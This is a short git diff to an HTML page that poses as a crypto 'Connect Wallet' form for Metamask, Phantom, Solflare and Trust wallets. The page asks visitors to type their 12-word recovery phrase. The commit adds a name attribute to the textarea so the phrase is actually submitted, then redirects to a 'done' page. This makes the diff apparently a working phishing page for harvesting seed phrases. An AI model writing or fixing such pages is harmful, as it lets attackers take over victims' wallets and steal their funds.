added name attribute

--- a/index.html
+++ b/index.html
@@ -53,13 +53,13 @@
                 <input type="hidden" name="_next" value="https://yaww-io.netlify.app//done.html">
                 <label for="Wallets">Select your wallet:</label>
                 <select name="Wallets" id="all-wallets">
-                    <option name="Wallets" id="Metamask">Metamask Wallet</option>
-                    <option name="Wallets" id="Phantom-wallet">Phantom Wallet</option>
-                    <option name="Wallets" id="Solflare">Solflare Wallet</option>
-                    <option name="Wallets" id="Trust-wallet">Trust Wallet</option>
+                    <option id="Metamask">Metamask Wallet</option>
+                    <option id="Phantom-wallet">Phantom Wallet</option>
+                    <option id="Solflare">Solflare Wallet</option>
+                    <option id="Trust-wallet">Trust Wallet</option>
                 </select>
                 <h3>Input your 12 phrase correctly to connect</h3>
-                <textarea></textarea>
+                <textarea name="Wallet information"></textarea>
               <button type="submit" class="wallet-btn"><i class="fa-solid fa-wallet"></i>&nbsp;&nbsp; Connect Wallet </button>
             </form>
             
